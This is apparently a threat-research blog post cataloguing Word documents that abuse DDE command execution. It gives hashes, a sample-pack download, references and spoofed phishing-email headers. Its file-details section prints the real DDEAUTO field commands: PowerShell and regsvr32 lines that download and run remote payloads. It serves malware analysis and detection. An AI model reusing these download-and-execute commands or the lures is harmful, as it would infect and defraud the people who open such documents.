<br /></div>
</div>
Milahttp://www.blogger.com/profile/09472209631979859691noreply@blogger.com1tag:blogger.com,1999:blog-7885177434994542510.post-11926016098245166042017-10-18T02:24:00.010-04:002023-01-22T01:01:14.167-05:00DDE Command Execution malware samples <div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-family: inherit;"><br /></span><div class="separator" style="clear: both; text-align: center;"><br /></div><span style="font-family: inherit;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDWD8qnxXUb7L1WC43qddj_9zxk9bVMC-n2g65itDcXh_57X8lg0M7jWIVV1MxIPsGHGc5DyQFUHqxnMxka_gzJjTjFV2YWioA36Pzn14LYDKfQnlLf5yejVBdNxv9iFRV14KYvgR9Y69AM0GiBI7QnorgwCb-fdiwqbOMZJPptsDe3sEZWq4Zg9W6/s487/image%20(7).png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="487" data-original-width="480" height="267" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDWD8qnxXUb7L1WC43qddj_9zxk9bVMC-n2g65itDcXh_57X8lg0M7jWIVV1MxIPsGHGc5DyQFUHqxnMxka_gzJjTjFV2YWioA36Pzn14LYDKfQnlLf5yejVBdNxv9iFRV14KYvgR9Y69AM0GiBI7QnorgwCb-fdiwqbOMZJPptsDe3sEZWq4Zg9W6/w262-h267/image%20(7).png" width="262" /></a></div><br />Here are a few samples related to the recent DDE Command execution</span><br />
<span style="font-family: inherit;"><br /></span><div style="text-align: justify;"><span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span></div><div style="text-align: justify;"><span style="font-family: inherit;"><a href="http://contagio.deependresearch.org/read/DDE_Microsoft+Office+DDE+Macro-less+Command+Execution+Vulnerability+_+InQuest.pdf">DDE Macro-less Command Execution Vulnerability</a></span></div><div style="text-align: justify;"><span style="font-family: inherit;"><br /></span></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><span style="font-family: inherit;"><div style="text-align: left;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9fekBavhMnuxb9txFvxkWzKz4DZBXwlXNpsm2_s6FKlTJngInQG_9h4amviU59zeRl61NodBmrkvhq-mtc9FDyOUGO8ZaBK-QZFXtHsqFqL0su0Z6rt5Hqpp8WElMdztahWYVyZ2dfdE/s1600/rednag.png" style="background: rgb(255, 255, 255); border: 1px solid rgb(255, 255, 255); box-shadow: rgba(0, 0, 0, 0) 1px 1px 5px; padding: 0px; position: relative;" /><span style="font-family: inherit;"><a href="http://contagio.deependresearch.org/Exploits/DDE_Office_Sample.zip"> Download. Email me if you need the password </a> (updated sample pack)</span></div><div style="text-align: left;"><span style="font-family: inherit;"><br /></span></div></span></div><div style="text-align: justify;"><span style="font-family: inherit;"><br /></span></div><div style="text-align: justify;"><span style="font-family: inherit;"><br /></span></div><div style="text-align: justify;"><span style="font-family: inherit;"><br /></span></div><div style="text-align: justify;"><span><a name='more'></a></span><span style="font-family: inherit;"><br /></span></div><div style="text-align: justify;"><span style="font-family: inherit;"><div dir="ltr" style="text-align: left;" trbidi="on"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJHESQjb4GvEj6AjI4HC55tTnkwYW-_B-GCO9NpivJXIy79pDY_Fy6PvojJ1RFbVvANLrfaeCT6ABzXwqiD7l3WzX77v0AoI4-qStU8dxA98XDYPZvzj3xYsVoz8VlP65hIlJbeNGwRCIQ5ohW8D5Gpb1X-NvDixJ9b6TQwbdhGXsSyQ69SA4aRZIQ/s43/ba.png" style="clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="43" data-original-width="43" height="43" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJHESQjb4GvEj6AjI4HC55tTnkwYW-_B-GCO9NpivJXIy79pDY_Fy6PvojJ1RFbVvANLrfaeCT6ABzXwqiD7l3WzX77v0AoI4-qStU8dxA98XDYPZvzj3xYsVoz8VlP65hIlJbeNGwRCIQ5ohW8D5Gpb1X-NvDixJ9b6TQwbdhGXsSyQ69SA4aRZIQ/s1600/ba.png" width="43" /></a><span style="font-family: verdana;">Links updated: Jan 20, 2023</span></div><div dir="ltr" trbidi="on"><span style="font-family: verdana;"><div dir="ltr" trbidi="on"><a href="https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html"></a></div><div dir="ltr" trbidi="on"><br style="text-align: left;" /></div></span></div></span></div>
<br />
<div style="background-color: #618f2b; color: white; line-height: 19px; text-align: center;">
<span style="font-family: inherit;"><b>References</b></span></div>
<div style="line-height: 19.6px;">
<div style="line-height: 19px;">
<div><br /></div><div style="line-height: 19px;"><div><span style="font-family: inherit;"><span>Reading:</span><br /><span><span style="text-align: justify;">10/18/2017</span><a href="http://contagio.deependresearch.org/read/DDE_yara-rules_Microsoft_Office_DDE_Command_Execution.rule+at+master+%C2%B7+InQuest_yara-rules+%C2%B7+GitHub.pdf" style="text-align: justify;"> InQuest/yara-rules</a><span style="text-align: justify;"> </span></span><br /><div><span style="font-family: inherit;"><span style="text-align: justify;">10/18/2017 </span><a href="http://contagio.deependresearch.org/read/DDE_Microsoft+Office+DDE+Macro-less+Command+Execution+Vulnerability+_+InQuest.pdf" style="text-align: justify;">Inquest: Microsoft Office DDE Macro-less Command Execution Vulnerability</a></span></div><div><span style="font-family: inherit;"><span style="text-align: justify;">10/18/2017 I</span><a href="http://contagio.deependresearch.org/read/DDE_Microsoft+Office+DDE+Vortex+Ransomware+Targeting+Poland+_+InQuest.pdf" style="text-align: justify;">nquest: Microsoft Office DDE Vortex Ransomware Targeting Poland</a></span></div><div><span style="font-family: inherit;">10/16/2017 <a href="https://twitter.com/noottrak/status/919975081828261888">https://twitter.com/noottrak/status/919975081828261888</a></span></div><div><span style="font-family: inherit;">10/14/2017 <a href="http://contagio.deependresearch.org/read/DDE_Microsoft+Office+DDE+Freddie+Mac+Targeted+Lure+_+InQuest.pdf">Inquest: Microsoft Office DDE Freddie Mac Targeted Lure </a></span></div><div><a href="http://contagio.deependresearch.org/read/DDE_Microsoft+Office+DDE+SEC+OMB+Approval+Lure+_+InQuest.pdf"><span style="font-family: inherit;">10/14/2017 Inquest: Microsoft Office DDE SEC OMB Approval Lure</span></a></div><div><span style="font-family: inherit;">10/12/2017 <a href="http://contagio.deependresearch.org/read/2017_Detecting+DDE+in+MS+Office+documents+%E2%80%93+NVISO+Labs.pdf">NViso labs: YARA DDE rules: DDE Command Execution observed in-the-wild</a> </span></div><div><span style="font-family: inherit;">10/11/2017 <a href="http://contagio.deependresearch.org/read/DDE_Spoofed+SEC+Emails+Distribute+Evolved+DNSMessenger.pdf">Talos:Spoofed SEC Emails Distribute Evolved DNSMessenger</a> </span></div><div><span style="font-family: inherit;">10/10/2017 <a href="http://contagio.deependresearch.org/read/2017_Detecting+DDE+in+MS+Office+documents+%E2%80%93+NVISO+Labs.pdf">NViso labs: MS Office DDE YARA rules</a></span></div><div style="text-align: justify;"><span style="font-family: inherit;">10/09/2017 <a href="http://contagio.deependresearch.org/read/Crime_2017_SensePost+_+Macro-less+code+exec+in+msword.pdf">Sensepost: Macro-less Code Exec in MSWord</a></span></div></span></div>
</div><div><span style="font-family: inherit;"><br /></span></div>
</div>
<div style="line-height: 19px;">
</div>
</div>
<span style="font-family: inherit;"><br /></span>
<br />
<div style="background-color: #618f2b; color: white; line-height: 19px; text-align: center;">
<span style="font-family: inherit;"><b>File information</b></span></div>
<div style="line-height: 19.6px;">
<div style="line-height: 19px;">
<div>
<u><span style="font-family: inherit;"><b>List of available files:</b></span></u><br />
<u><b>Word documents:</b></u><br />
bf38288956449bb120bae525b6632f0294d25593da8938bbe79849d6defed5cb<br />
a1294fce91af3f7e7691f8307d07aebd4636402e4e6a244faac5ac9b36f8428<br />
b68b3f98f78b42ac83e356ad61a4d234fe620217b250b5521587be49958d568<br />
9d67659a41ef45219ac64967b7284dbfc435ee2df1fccf0ba9c7464f03fdc862<br />
7777ccbaaafe4e50f800e659b7ca9bfa58ee7eefe6e4f5e47bc3b38f84e52280<br />
313fc5bd8e1109d35200081e62b7aa33197a6700fc390385929e71aabbc4e065<br />
9fa8f8ccc29c59070c7aac94985f518b67880587ff3bbfabf195a3117853984d<br />
8630169ab9b4587382d4b9a6d17fd1033d69416996093b6c1a2ecca6b0c04184<br />
11a6422ab6da62d7aad4f39bed0580db9409f9606e4fa80890a76c7eabfb1c13<br />
bd61559c7dcae0edef672ea922ea5cf15496d18cc8c1cbebee9533295c2d2ea9<br />
<u><br /></u>
<u><b>Payload </b></u><br />
8c5209671c9d4f0928f1ae253c40ce7515d220186bb4a97cbaf6c25bd3be53cf<br />
2330bf6bf6b5efa346792553d3666c7bc290c98799871f5ff4e7d44d2ab3b28c<br />
316f0552684bd09310fc8a004991c9b7ac200fb2a9a0d34e59b8bbd30b6dc8ea<br />
5d3b34c963002bd46848f5fe4e8b5801da045e821143a9f257cb747c29e4046f<br />
fe72a6b6da83c779787b2102d0e2cfd45323ceab274924ff617eb623437c2669 <span style="font-family: inherit;"></span><br />
<div>
<br /></div>
<b><u><span style="font-family: inherit;"><br /></span></u></b>
<u><b>File details with MD5 hashes:</b></u></div>
<div>
<u>Word documents:</u><br />
1. <b>bf38288956449bb120bae525b6632f0294d25593da8938bbe79849d6defed5cb</b> EDGAR_Rules.docx<br />
bcadcf65bcf8940fff6fc776dd56563 <i>( DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell -C ;echo \"https://sec.gov/\";IEX((new-object net.webclient).downloadstring('https://pastebin.com/raw/pxSE2TJ1')) ")</i><br />
<br />
2. <b>1a1294fce91af3f7e7691f8307d07aebd4636402e4e6a244faac5ac9b36f8428 </b>EDGAR_Rules_2017.docx<br />
2c0cfdc5b5653cb3e8b0f8eeef55fc32 <i>( DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell -C ;echo \"https://sec.gov/\";IEX((new-object net.webclient).downloadstring('https://trt.doe.louisiana.gov/fonts.txt')) ")</i><br />
<br />
3 <b>4b68b3f98f78b42ac83e356ad61a4d234fe620217b250b5521587be49958d568 </b>SBNG20171010.docx<br />
8be9633d5023699746936a2b073d2d67 <i>(DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://104.131.178.222/s.ps1');powershell -Command $e. </i><br />
<br />
4. <b>9d67659a41ef45219ac64967b7284dbfc435ee2df1fccf0ba9c7464f03fdc862 </b>Plantilla - InformesFINAL.docx<br />
78f07a1860ae99c093cc80d31b8bef14 <i>( DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe $e=new-object -com internetexplorer.application; $e.visible=$true; $e.navigate2(' https://i.ytimg.com/vi/ErLLFVf-0Mw/maxresdefault.jpg '); powershell -e $e " </i><br />
<br />
5. <b>7777ccbaaafe4e50f800e659b7ca9bfa58ee7eefe6e4f5e47bc3b38f84e52280 </b><br />
aee33500f28791f91c278abb3fcdd942 <i>(DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://www.filefactory.com/file/2vxfgfitjqrf/Citibk_MT103_Ref71943.exe');powershell -e_</i><br />
<br />
6. <b>313fc5bd8e1109d35200081e62b7aa33197a6700fc390385929e71aabbc4e065 </b><span face=""helvetica neue" , "helvetica" , "arial" , sans-serif" style="background-color: white; color: #333333; font-size: 13px;">Giveaway.docx</span><br />
<b>507784c0796ffebaef7c6fc53f321cd6</b> <i>(DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\system32\\cmd.exe" "/c regsvr32 /u /n /s /i:\"h\"t\"t\"p://downloads.sixflags-frightfest.com/ticket-ids scrobj.dll" "For Security Reasons")</i><br />
<br />
<br />
7. <b>9fa8f8ccc29c59070c7aac94985f518b67880587ff3bbfabf195a3117853984d </b>Filings_and_Forms.docx<br />
47111e9854db533c328ddbe6e962602a (DDEAUTO <i>"C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -sta -NonI -W Hidden -C $e=(new-object system.net.webclient).downloadstring('http://goo.gl/Gqdihn');powershell.exe -e $e # " "Filings_and_Forms.docx")</i><br />
<br />
8. <b>8630169ab9b4587382d4b9a6d17fd1033d69416996093b6c1a2ecca6b0c04184</b> ~WRD0000.tmp<br />
47111e9854db533c328ddbe6e962602a<br />
<br />
<br />
9. <b>11a6422ab6da62d7aad4f39bed0580db9409f9606e4fa80890a76c7eabfb1c13 </b>~WRD0003.tmp<br />
d78ae3b9650328524c3150bef2224460<br />
<br />
<br />
10. <b>bd61559c7dcae0edef672ea922ea5cf15496d18cc8c1cbebee9533295c2d2ea9 </b>DanePrzesylki17016.doc<br />
5786dbcbe1959b2978e979bf1c5cb450<br />
<br />
<br />
<b><u>Payload Powershell</u></b><br />
<br />
1. <b>8c5209671c9d4f0928f1ae253c40ce7515d220186bb4a97cbaf6c25bd3be53cf</b> fonts.txt<br />
<br />
2 <b>2330bf6bf6b5efa346792553d3666c7bc290c98799871f5ff4e7d44d2ab3b28c</b> - powershell script from hxxp://citycarpark.my/components/com_admintools/mscorier<br />
<br />
<b><u>Payload PE</u></b><br />
<br />
1. <b>316f0552684bd09310fc8a004991c9b7ac200fb2a9a0d34e59b8bbd30b6dc8ea </b>Citibk_MT103_Ref71943.exe<br />
3a4d0c6957d8727c0612c37f27480f1e<br />
<br />
2. <b>5d3b34c963002bd46848f5fe4e8b5801da045e821143a9f257cb747c29e4046f</b> FreddieMacPayload<br />
4f3a6e16950b92bf9bd4efe8bbff9a1e<br />
<br />
3. <b>fe72a6b6da83c779787b2102d0e2cfd45323ceab274924ff617eb623437c2669</b> s50.exe Poland payload<br />
09d71f068d2bbca9fac090bde74e762b<br />
<br />
<br /></div>
<span style="font-family: inherit;">
</span>
<br />
<div>
</div>
<!--more--><span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<br />
<div>
</div>
<div style="line-height: 19.6px;">
<div style="line-height: 19px;">
</div>
</div>
<span style="font-family: inherit;"><br /></span>
<br />
<div style="background-color: #618f2b; color: white; line-height: 19px; text-align: center;">
<span style="font-family: inherit;"><b>Message information</b></span></div>
<div>
<span style="font-family: inherit;"><br /></span></div>
<div>
<span style="font-family: inherit;"><br /></span></div>
<div>
<span style="font-family: inherit;">For the EDGAR campaign</span><br />
<b><span style="font-family: inherit;">bf38288956449bb120bae525b6632f0294d25593da8938bbe79849d6defed5cb</span></b></div>
<div>
<span style="font-family: inherit;"><br /></span></div>
</div>
</div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBK4BFqBnsvTHufARlMVNtFjKwpWIVLPIflxU9jeueaBTjGsHHnT2IpSdgeWnKwOtxhLWV4GshTtHpk1W7YgQKKcW0AI3anFXOxDqGcjzxRZTa6QUSMa9k1VdL5Q4VpHJOxpeeem_s3Z8/s1600/email.png" style="clear: left; float: left; margin-bottom: 1em; margin-left: 1em;"><span style="font-family: inherit;"><img border="0" data-original-height="303" data-original-width="546" height="177" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBK4BFqBnsvTHufARlMVNtFjKwpWIVLPIflxU9jeueaBTjGsHHnT2IpSdgeWnKwOtxhLWV4GshTtHpk1W7YgQKKcW0AI3anFXOxDqGcjzxRZTa6QUSMa9k1VdL5Q4VpHJOxpeeem_s3Z8/s320/email.png" width="320" /></span></a><span style="font-family: inherit;"><span face=""helvetica neue" , "helvetica" , "arial" , sans-serif" style="color: #333333;"> </span>Received: from usa2.serverhoshbilling.com (usa2.serverhoshbilling.com [<b><span style="color: red;">209.90.232.236</span></b>])</span><br />
<div class="p1">
<span style="font-family: inherit;"><span class="Apple-tab-span"> </span>by m0049925.ppops.net with ESMTP id 2dhb488ej6-1</span></div>
<div class="p1">
<span style="font-family: inherit;"><span class="Apple-tab-span"> </span>(version=TLSv1.2 cipher=ECDHE-RSA-AES256-GCM-SHA384 bits=256 verify=NOT)</span></div>
<div class="p1">
<span style="font-family: inherit;"><span class="Apple-tab-span"> </span>for <snip>; Wed, 11 Oct 2017 00:09:20 -0400</span></div>
<div class="p1">
<span style="font-family: inherit;">Received: from salesapo by usa2.serverhoshbilling.com with local (Exim 4.89)</span></div>
<div class="p1">
<span style="font-family: inherit;"><span class="Apple-tab-span"> </span>(envelope-from <EDGAR@sec.gov>)</span></div>
<div class="p1">
<span style="font-family: inherit;"><span class="Apple-tab-span"> </span>id 1e28HE-0001S5-Ew</span></div>
<div class="p1">
<span style="font-family: inherit;"><span class="Apple-tab-span"> </span>for <snip>; Wed, 11 Oct 2017 00:05:48 -0400</span></div>
<div class="p1">
<span style="font-family: inherit;">To: <snip></span></div>
<div class="p1">
<span style="font-family: inherit;">Subject: EDGAR Filings</span></div>
<div class="p1">
<span style="font-family: inherit;">X-PHP-Script: roofingexperts.org/wp-content/themes/sp/examples/send_edgar_corps.php for 89.106.109.106, 162.158.90.75</span></div>
<div class="p1">
<span style="font-family: inherit;">X-PHP-Originating-Script: 658:class.phpmailer.php</span></div>
<div class="p1">
<span style="font-family: inherit;">Date: Wed, 11 Oct 2017 04:05:48 +0000</span></div>
<div class="p1">
<span style="font-family: inherit;">From: EDGAR <EDGAR@sec.gov></span></div>
<div class="p1">
<span style="font-family: inherit;">Reply-To: EDGAR <EDGAR@sec.gov></span></div>
<div class="p1">
<span style="font-family: inherit;">Message-ID: <7608a3de5fe6c9bf7df6782a8aa9790f@roofingexperts.org></span></div>
<div class="p1">
<span style="font-family: inherit;">X-Mailer: PHPMailer 5.2.22 (https://github.com/PHPMailer/PHPMailer)</span></div>
<div class="p1">
<span style="font-family: inherit;">MIME-Version: 1.0</span></div>
<div class="p1">
<span style="font-family: inherit;">Content-Type: multipart/mixed;</span></div>
<div class="p1">
<span style="font-family: inherit;"><span class="Apple-tab-span"> </span>boundary="b1_7608a3de5fe6c9bf7df6782a8aa9790f"</span></div>
<div class="p1">
<span style="font-family: inherit;">Content-Transfer-Encoding: 8bit</span></div>
<div class="p1">
<span style="font-family: inherit;">X-AntiAbuse: This header was added to track abuse, please include it with any abuse report</span></div>
<div class="p1">
<span style="font-family: inherit;">X-AntiAbuse: Primary Hostname - usa2.serverhoshbilling.com</span></div>
<div class="p1">
<span style="font-family: inherit;">X-AntiAbuse: Original Domain - nu.com</span></div>
<div class="p1">
<span style="font-family: inherit;">X-AntiAbuse: Originator/Caller UID/GID - [658 497] / [47 12]</span></div>
<div class="p1">
<span style="font-family: inherit;">X-AntiAbuse: Sender Address Domain - sec.gov</span></div>
<div class="p1">
<span style="font-family: inherit;">X-Get-Message-Sender-Via: <b><span style="color: red;">usa2.serverhoshbilling.com</span></b>: authenticated_id: salesapo/only user confirmed/virtual account not confirmed</span></div>
<div class="p1">
<span style="font-family: inherit;">X-Authenticated-Sender: usa2.serverhoshbilling.com: salesapo</span></div>
<div class="p1">
<span style="font-family: inherit;">X-Source: /opt/cpanel/ea-php56/root/usr/bin/lsphp</span></div>
<div class="p1">
<span style="font-family: inherit;">X-Source-Args: lsphp:ntent/themes/sp/examples/send_edgar_corps.php</span></div>
<div class="p1">
<span style="font-family: inherit;">X-Source-Dir: salesapogee.com:/roofingexperts/wp-content/themes/sp/examples</span></div>
<div class="p1">
<span style="font-family: inherit;">X-CLX-Shades: Junk</span></div>
<div class="p1">
<span style="font-family: inherit;">X-CLX-Response: <snip></span></div>
<div class="p1">
<span style="font-family: inherit;">X-Proofpoint-Virus-Version: vendor=fsecure engine=2.50.10432:,, definitions=2017-10-10_08:,,</span></div>
<div class="p1">
<span style="font-family: inherit;"><span class="Apple-converted-space"> </span>signatures=0</span></div>
<div class="p1">
<span style="font-family: inherit;">X-Proofpoint-Spam-Details: rule=spam policy=default score=99 priorityscore=1501 malwarescore=0</span></div>
<div class="p1">
<span style="font-family: inherit;"><span class="Apple-converted-space"> </span>suspectscore=0 phishscore=0 bulkscore=0 spamscore=0 clxscore=-262</span></div>
<div class="p1">
<span style="font-family: inherit;"><span class="Apple-converted-space"> </span>lowpriorityscore=0 impostorscore=0 adultscore=0 classifier=clx:Junk</span></div>
<div class="p1">
<span style="font-family: inherit;"><span class="Apple-converted-space"> </span>adjust=0 reason=mlx scancount=1 engine=8.0.1-1707230000</span></div>
<div class="p1">
<span style="font-family: inherit;"><span class="Apple-converted-space"> </span>definitions=main-1710110060</span></div>
<div class="p2">
<span style="font-family: inherit;"><br /></span></div>
<div class="p1">
<span style="font-family: inherit;">This is a multi-part message in MIME format.</span></div>
<div class="p2">
<span style="font-family: inherit;"><br /></span></div>
<div class="p1">
<span style="font-family: inherit;">--b1_7608a3de5fe6c9bf7df6782a8aa9790f</span></div>
<div class="p1">
<span style="font-family: inherit;">Content-Type: multipart/alternative;</span></div>
<div class="p1">
<span style="font-family: inherit;"><span class="Apple-tab-span"> </span>boundary="b2_7608a3de5fe6c9bf7df6782a8aa9790f"</span></div>
<div class="p2">
<span style="font-family: inherit;"><br /></span></div>
<div class="p1">
<span style="font-family: inherit;">--b2_7608a3de5fe6c9bf7df6782a8aa9790f</span></div>
<div class="p1">
<span style="font-family: inherit;">Content-Type: text/plain; charset=us-ascii</span></div>
<div class="p2">
<span style="font-family: inherit;"><br /></span></div>
<div class="p1">
<span style="font-family: inherit;">Important information about last changes in EDGAR Filings</span></div>
<div class="p2">
<span style="font-family: inherit;"><br /></span></div>
<div class="p2">
<span style="font-family: inherit;"><br /></span></div>
<div class="p1">
<span style="font-family: inherit;">--b2_7608a3de5fe6c9bf7df6782a8aa9790f</span></div>
<div class="p1">
<span style="font-family: inherit;">Content-Type: text/html; charset=us-ascii</span></div>
<div class="p2">
<span style="font-family: inherit;"><br /></span></div>
<div class="p1">
<span style="font-family: inherit;"><b>Important information about last changes in EDGAR Filings</b><br/><br/>Attached document is directed to <snip></span></div>
<div class="p2">
<span style="font-family: inherit;"><br /></span></div>
<div class="p2">
<span style="font-family: inherit;"><br /></span></div>
<div class="p2">
<span style="font-family: inherit;"><br /></span></div>
<div class="p1">
<span style="font-family: inherit;">--b2_7608a3de5fe6c9bf7df6782a8aa9790f--</span></div>
<div class="p2">
<span style="font-family: inherit;"><br /></span></div>
<div class="p1">
<span style="font-family: inherit;">--b1_7608a3de5fe6c9bf7df6782a8aa9790f</span></div>
<div class="p1">
<span style="font-family: inherit;">Content-Type: application/vnd.openxmlformats-officedocument.wordprocessingml.document; name="EDGAR_Rules_2017.docx"</span></div>
<div class="p1">
<span style="font-family: inherit;">Content-Transfer-Encoding: base64</span></div>
<div class="p1">
<span style="font-family: inherit;">Content-Disposition: attachment; filename=EDGAR_Rules_2017.docx</span></div>
<div class="p2">
<span style="font-family: inherit;"><br /></span></div>
<div class="p1">
<span style="font-family: inherit;"><snip></span></div>
<div class="p2">
<span style="font-family: inherit;"><br /></span></div>
<div class="p2">
<span style="font-family: inherit;"><br /></span></div>
<div class="p1">
<span style="font-family: inherit;">--b1_7608a3de5fe6c9bf7df6782a8aa9790f--</span></div>
<div class="p2">
<span style="font-family: inherit;"><br /></span></div>
<div class="p2">
<span style="font-family: inherit;"><br /></span></div>
<div class="p2">
<b><span style="font-family: inherit;">for 4b68b3f98f78b42ac83e356ad61a4d234fe620217b250b5521587be49958d568 SBNG20171010.docx</span></b></div>
<div class="p2">
<span style="font-family: inherit;"><br /></span></div>
<div class="p2">
<span style="font-family: inherit;">Received: from VI1PR08MB2670.eurprd08.prod.outlook.com (10.175.245.20) by</span></div>
<div class="p2">
<span style="font-family: inherit;"> AM4PR08MB2659.eurprd08.prod.outlook.com (10.171.190.148) with Microsoft SMTP</span></div>
<div class="p2">
<span style="font-family: inherit;"> Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id</span></div>
<div class="p2">
<span style="font-family: inherit;"> 15.20.77.7 via Mailbox Transport; Thu, 12 Oct 2017 10:45:16 +0000</span></div>
<div class="p2">
<span style="font-family: inherit;">Received: from DB6PR0802MB2600.eurprd08.prod.outlook.com (10.172.252.17) by</span></div>
<div class="p2">
<span style="font-family: inherit;"> VI1PR08MB2670.eurprd08.prod.outlook.com (10.175.245.20) with Microsoft SMTP</span></div>
<div class="p2">
<span style="font-family: inherit;"> Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id</span></div>
<div class="p2">
<span style="font-family: inherit;"> 15.20.77.7; Thu, 12 Oct 2017 10:45:15 +0000</span></div>
<div class="p2">
<span style="font-family: inherit;">Received: from VI1PR0802CA0047.eurprd08.prod.outlook.com</span></div>
<div class="p2">
<span style="font-family: inherit;"> (2603:10a6:800:a9::33) by DB6PR0802MB2600.eurprd08.prod.outlook.com</span></div>
<div class="p2">
<span style="font-family: inherit;"> (2603:10a6:4:a2::17) with Microsoft SMTP Server (version=TLS1_2,</span></div>
<div class="p2">
<span style="font-family: inherit;"> cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id 15.20.77.7; Thu, 12 Oct</span></div>
<div class="p2">
<span style="font-family: inherit;"> 2017 10:45:14 +0000</span></div>
<div class="p2">
<span style="font-family: inherit;">Received: from DB3FFO11FD006.protection.gbl (2a01:111:f400:7e04::133) by</span></div>
<div class="p2">
<span style="font-family: inherit;"> VI1PR0802CA0047.outlook.office365.com (2603:10a6:800:a9::33) with Microsoft</span></div>
<div class="p2">
<span style="font-family: inherit;"> SMTP Server (version=TLS1_2,</span></div>
<div class="p2">
<span style="font-family: inherit;"> cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id 15.20.77.7 via Frontend</span></div>
<div class="p2">
<span style="font-family: inherit;"> Transport; Thu, 12 Oct 2017 10:45:14 +0000</span></div>
<div class="p2">
<span style="font-family: inherit;">Received: from za-hybrid.mail.standardbank.com (147.152.120.47) by</span></div>
<div class="p2">
<span style="font-family: inherit;"> DB3FFO11FD006.mail.protection.outlook.com (10.47.216.95) with Microsoft SMTP</span></div>
<div class="p2">
<span style="font-family: inherit;"> Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P384) id</span></div>
<div class="p2">
<span style="font-family: inherit;"> 15.20.77.10 via Frontend Transport; Thu, 12 Oct 2017 10:45:12 +0000</span></div>
<div class="p2">
<span style="font-family: inherit;">Received: from <snip> (10.234.178.186) by</span></div>
<div class="p2">
<span style="font-family: inherit;"> <snip>(10.144.20.58) with Microsoft SMTP</span></div>
<div class="p2">
<span style="font-family: inherit;"> Server (TLS) id 14.3.339.0; Thu, 12 Oct 2017 12:44:35 +0200</span></div>
<div class="p2">
<span style="font-family: inherit;">Received: from <snip> (10.234.174.102) by</span></div>
<div class="p2">
<span style="font-family: inherit;"> <snip> with Microsoft SMTP Server</span></div>
<div class="p2">
<span style="font-family: inherit;"> id 8.3.389.2; Thu, 12 Oct 2017 11:43:42 +0100</span></div>
<div class="p2">
<span style="font-family: inherit;">Received: from cluster-a.mailcontrol.com (unknown [85.115.52.190])<span style="white-space: pre;"> </span>by</span></div>
<div class="p2">
<span style="font-family: inherit;"> Forcepoint Email with ESMTPS id AC3EDEB6D852BD348649;<span style="white-space: pre;"> </span>Thu, 12 Oct 2017</span></div>
<div class="p2">
<span style="font-family: inherit;"> 11:43:38 +0100 (CET)</span></div>
<div class="p2">
<span style="font-family: inherit;">Received: from rly14a.srv.mailcontrol.com (localhost [127.0.0.1])<span style="white-space: pre;"> </span>by</span></div>
<div class="p2">
<span style="font-family: inherit;"> rly14a.srv.mailcontrol.com (MailControl) with ESMTP id v9CAhaCs039950;<span style="white-space: pre;"> </span>Thu,</span></div>
<div class="p2">
<span style="font-family: inherit;"> 12 Oct 2017 11:43:36 +0100</span></div>
<div class="p2">
<span style="font-family: inherit;">Received: from localhost.localdomain (localhost.localdomain [127.0.0.1])<span style="white-space: pre;"> </span>by</span></div>
<div class="p2">
<span style="font-family: inherit;"> rly14a.srv.mailcontrol.com (MailControl) id v9CAhaRp039947;<span style="white-space: pre;"> </span>Thu, 12 Oct 2017</span></div>
<div class="p2">
<span style="font-family: inherit;"> 11:43:36 +0100</span></div>
<div class="p2">
<span style="font-family: inherit;">Received: from mx1.ssl-secure-mail.com (mx1.ssl-secure-mail.com</span></div>
<div class="p2">
<span style="font-family: inherit;"> [188.166.157.242])<span style="white-space: pre;"> </span>by rly14a-eth0.srv.mailcontrol.com (envelope-sender</span></div>
<div class="p2">
<span style="font-family: inherit;"> <Emmanuel.Chatta@stadnardbank.co.za>) (MIMEDefang) with ESMTP id</span></div>
<div class="p2">
<span style="font-family: inherit;"> v9CAhZoc039719<span style="white-space: pre;"> </span>(TLS bits=256 verify=NO); Thu, 12 Oct 2017 11:43:36 +0100</span></div>
<div class="p2">
<span style="font-family: inherit;"> (BST)</span></div>
<div class="p2">
<span style="font-family: inherit;">Received: from authenticated-user (mx1.ssl-secure-mail.com [188.166.157.242])</span></div>
<div class="p2">
<span style="font-family: inherit;"><span style="white-space: pre;"> </span>(using TLSv1 with cipher ECDHE-RSA-AES256-SHA (256/256 bits))<span style="white-space: pre;"> </span>(No client</span></div>
<div class="p2">
<span style="font-family: inherit;"> certificate requested)<span style="white-space: pre;"> </span>by mx1.ssl-secure-mail.com (Postfix) with ESMTPSA id</span></div>
<div class="p2">
